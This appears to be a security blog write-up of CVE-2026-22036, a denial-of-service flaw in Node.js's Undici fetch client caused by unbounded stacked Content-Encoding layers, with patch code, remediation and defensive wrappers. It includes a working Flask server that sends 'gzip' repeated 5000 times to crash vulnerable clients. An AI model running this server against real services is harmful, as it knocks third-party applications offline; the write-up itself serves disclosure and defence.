CVE-2026-22036

Death by a Thousand Gzips: The Node.js Undici Decompression Loop

Alon Barad
Software Engineer

Jan 15, 2026 · 6 min read

Executive Summary (TL;DR)

Undici, the engine behind Node.js's native `fetch()`, failed to limit the number of decompression steps it would perform on a response. By sending a header like `Content-Encoding: gzip, gzip, ...` with the token repeated thousands of times, a malicious server can force the client to allocate thousands of stream objects, driving up CPU and memory usage until the process crashes (DoS). The fix introduces a hard limit of 5 encoding layers.

A resource exhaustion vulnerability in the Undici HTTP client allows malicious servers to crash Node.js applications by supplying an excessive number of compression layers in the Content-Encoding header.

The Hook: When Fetch Goes Wrong

We all love fetch(). It’s standard, it’s modern, and in Node.js, it’s powered by a library called Undici. For years, Node developers relied on the clunky http module or third-party giants like axios and request. Undici came along promising speed and spec compliance. And for the most part, it delivered.

But here's the thing about "spec compliance": the HTTP specification is a wild place. It allows for things that no sane engineer would ever actually use, but which must be supported strictly for the sake of correctness. One of those things is the Content-Encoding header.

Usually, you see Content-Encoding: gzip or br (Brotli). Maybe, if you are working with some ancient enterprise legacy nightmare, you might see compress. The spec, however, allows you to stack them. You can compress a file, then compress the result, then compress that result. Undici handles this automatically to be helpful. Unfortunately, it was a little too helpful.
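
To make the stacking concrete, here is a tiny Node.js sketch using the built-in zlib module. This is illustration only, not Undici's code: encode twice on the way out, then peel the layers off in reverse order on the way in, one per token listed in the header.

// Illustration only: what "Content-Encoding: gzip, gzip" means on the wire
const zlib = require('node:zlib')

const original = Buffer.from('hello world')

// Server side: gzip applied twice before sending
const wireBytes = zlib.gzipSync(zlib.gzipSync(original))

// Client side: undo each layer in reverse order, one per listed encoding
const decoded = zlib.gunzipSync(zlib.gunzipSync(wireBytes))

console.log(decoded.toString()) // "hello world"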

The Flaw: infinite_loops.jpg

The vulnerability lies in how Undici handled that stacking mechanism. Logic dictates that if a server sends a response, it might be encoded. Undici's job is to look at the Content-Encoding header, split it by commas, and set up a reverse bucket brigade to decode the data back into its original form before handing it to your application.

In lib/interceptor/decompress.js, the code did exactly that: it split the header string and iterated over the entries. For every entry, it instantiated a new DecompressorStream (usually wrapping Node's native Zlib or Brotli bindings) and piped the output of one into the input of the next.

The catch? There was no stop sign. No bouncer at the door counting the guests. If a malicious server sent a header with gzip repeated 10,000 times, Undici would obediently attempt to create a pipeline of 10,000 streams.

This isn't a traditional "zip bomb" where a small file expands to fill your hard drive. This is an allocation bomb. Creating thousands of stream objects—each with its own internal buffers, state management, and C++ bindings—is expensive. It eats memory for breakfast and CPU cycles for lunch, freezing the Node.js event loop until the process gasps and dies.
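
If you want a rough feel for that cost, you can allocate a pile of idle decompression streams yourself with Node's built-in zlib module. This is not Undici's code, and the exact numbers depend on your platform and Node version; the point is the trend, not the figure.

// Rough, standalone illustration of the allocation cost (not Undici code)
const zlib = require('node:zlib')

const before = process.memoryUsage().rss

const streams = []
for (let i = 0; i < 10_000; i++) {
  // Each Gunzip stream carries its own buffers and a native zlib context
  streams.push(zlib.createGunzip())
}

const after = process.memoryUsage().rss
console.log(`~${((after - before) / 1024 / 1024).toFixed(1)} MiB held by 10,000 idle streams`)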

The Code: The Smoking Gun

Let's look at the crime scene. This is the logic inside the DecompressHandler class before the patch. It's clean, readable, and dangerously naive.

// PRE-PATCH (Simplified for dramatic effect)
#createDecompressionChain (encodings) {
  const parts = encodings.split(',')
  const decompressors = []
 
  for (const part of parts) {
    // 1. Read the encoding
    const encoding = part.trim().toLowerCase()
    
    // 2. Create a heavy stream object for it
    const decompressor = new DecompressorStream(encoding)
    
    // 3. Add to the pile
    decompressors.push(decompressor)
  }
  return decompressors
}

See the loop? It runs once for every comma-separated entry in the header. Now, let's look at the fix implemented in commit b04e3cbb569c1596f86c108e9b52c79d8475dcb3. The developers added a hard sanity check, similar to what curl and browsers have done for years.

// POST-PATCH
#createDecompressionChain (encodings) {
  const parts = encodings.split(',')
  
  // SANITY CHECK START
  const maxContentEncodings = 5
  if (parts.length > maxContentEncodings) {
    throw new Error(`too many content-encodings in response: ${parts.length}, maximum allowed is ${maxContentEncodings}`)
  }
  // SANITY CHECK END
 
  // ... proceed with loop
}

Five. That’s the magic number. If you are wrapping your HTTP response in more than five layers of compression, you aren't optimizing bandwidth; you're just trolling.

The Exploit: Building the Pipeline of Doom

Exploiting this is trivial if you can trick a target server into visiting a URL you control (SSRF) or if the target is a crawler/bot.

You don't need to generate a massive payload. You just need to generate a massive header. Here is a conceptual Python script that acts as the malicious server:

from flask import Flask, Response
app = Flask(__name__)
 
@app.route('/')
def malicious():
    # The Payload: 'gzip' repeated 5000 times
    evil_header = ", ".join(["gzip"] * 5000)
    
    # We send a tiny body, it doesn't matter.
    # The client dies trying to build the pipe, not processing the data.
    return Response("Hello, dead process.", headers={"Content-Encoding": evil_header})
 
if __name__ == '__main__':
    app.run(port=80)

When the vulnerable Node.js client hits this endpoint:

  1. It receives the headers.
  2. It sees 5,000 gzip directives.
  3. It enters the loop in createDecompressionChain.
  4. Memory usage spikes as thousands of Zlib contexts are initialized.
  5. The Event Loop blocks completely while C++ bindings are set up.
  6. The application becomes unresponsive or crashes with an Out of Memory (OOM) error.
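
For completeness, here is what the victim side might look like. The hostname is a placeholder for the malicious server above; on a vulnerable Undici, the damage happens while the response pipeline is being assembled, before any body bytes reach this code.

// Hypothetical victim: any Node.js service fetching an attacker-controlled URL
async function preview (url) {
  const res = await fetch(url) // headers arrive, decompression chain gets built
  return (await res.text()).slice(0, 200)
}

// On a vulnerable version the crash happens inside the library, so the
// .catch below never gets a chance to run.
preview('http://attacker.example/').catch(console.error)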

This is particularly nasty because it happens before the application code receives the response body. You can't catch this with a try/catch block around your logic if the crash happens inside the library's internal stream setup.

The Impact: Why Low CVSS is a Lie

The official CVSS score is 3.7 (Low). This is technically correct based on the formula: it requires the victim to connect to the attacker (Attack Complexity: High). But don't let that fool you.

In the modern web, servers connect to untrusted URLs all the time:

  • Webhooks: "Enter your URL and we'll send you a ping."
  • Link Previews: Discord, Slack, and social media bots fetching metadata.
  • Image Proxies: Services that resize images from remote URLs.
  • Feed Aggregators: RSS readers.

If you run any service that fetches a user-supplied URL using Node.js fetch (or a library wrapping it), you are vulnerable. A single request from a malicious user can take down a worker process. If you don't have robust process restart strategies (like PM2 or Kubernetes probes), your service goes dark.

The Fix: Update and Monitor

The fix is straightforward: the library now limits the encoding chain to 5 layers. If a server tries to get cute, Undici throws an error: too many content-encodings in response.
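
Unlike the pre-patch failure mode, that error is something your application can actually handle. Exactly where it surfaces (the fetch call itself or the body read) is an implementation detail, so a cautious sketch wraps both:

// Sketch: handling an over-encoded response on a patched Undici
async function safeFetch (untrustedUrl) {
  try {
    const res = await fetch(untrustedUrl)
    return await res.text()
  } catch (err) {
    // e.g. "too many content-encodings in response: 5000, maximum allowed is 5"
    console.warn('refusing over-encoded response:', err.message)
    return null
  }
}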

Remediation Steps:

  1. Check your lockfiles: Look for undici in package-lock.json or yarn.lock.
  2. Update: You need version 6.23.0 or later on the 6.x line, or 7.18.0 or later on the 7.x line.
  3. Node.js Core: Since Undici is bundled with Node.js, updating your Node.js runtime to the latest security release is the safest bet (a quick runtime version check is sketched below).
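
On recent Node.js releases the bundled Undici version is exposed on process.versions, which makes for a quick sanity check of what your runtime actually ships, as opposed to what your lockfile declares:

// Print the Undici build bundled with this Node.js binary
console.log('node', process.version, 'bundled undici', process.versions.undici)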

Defense in Depth: If you are writing a crawler, don't just rely on library patches. Implement your own timeouts and resource limits. Never trust an external HTTP server to play nice.
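
As one concrete example of that mindset, you can put your own budget on both the time and the bytes you are willing to spend on an untrusted URL. This is a sketch, not a complete defense: the 10-second timeout and 5 MB cap are arbitrary example values, and no client-side timeout can unblock an event loop that is already saturated, which is why the process-restart strategies mentioned above still matter.

// Sketch: bounding time and size when fetching an untrusted URL
async function fetchUntrusted (url, { timeoutMs = 10_000, maxBytes = 5 * 1024 * 1024 } = {}) {
  // AbortSignal.timeout aborts the request if it takes longer than timeoutMs
  const res = await fetch(url, { signal: AbortSignal.timeout(timeoutMs) })
  if (!res.body) return Buffer.alloc(0)

  const chunks = []
  let total = 0
  for await (const chunk of res.body) {
    total += chunk.length
    if (total > maxBytes) throw new Error(`response exceeded ${maxBytes} bytes`)
    chunks.push(chunk)
  }
  return Buffer.concat(chunks)
}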


Technical Appendix

CVSS Score: 3.7 / 10 (Low)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
EPSS Probability: 0.04%

Affected Systems

  • Node.js applications using the global fetch()
  • Undici v7.x (< 7.18.0)
  • Undici v6.x (< 6.23.0)

Affected Versions Detail

Product             Affected Versions     Fixed Version
Undici (Node.js)    >= 7.0.0, < 7.18.0    7.18.0
Undici (Node.js)    < 6.23.0              6.23.0

Attribute           Detail
CWE ID              CWE-770
Attack Vector       Network
CVSS                3.7 (Low)
Impact              Denial of Service (DoS)
Component           lib/interceptor/decompress.js
Limit Introduced    5 encodings

CWE-770: Allocation of Resources Without Limits or Throttling

Vulnerability Timeline

  • 2026-01-06: Fix authored by Matteo Collina
  • 2026-01-14: CVE and GHSA published
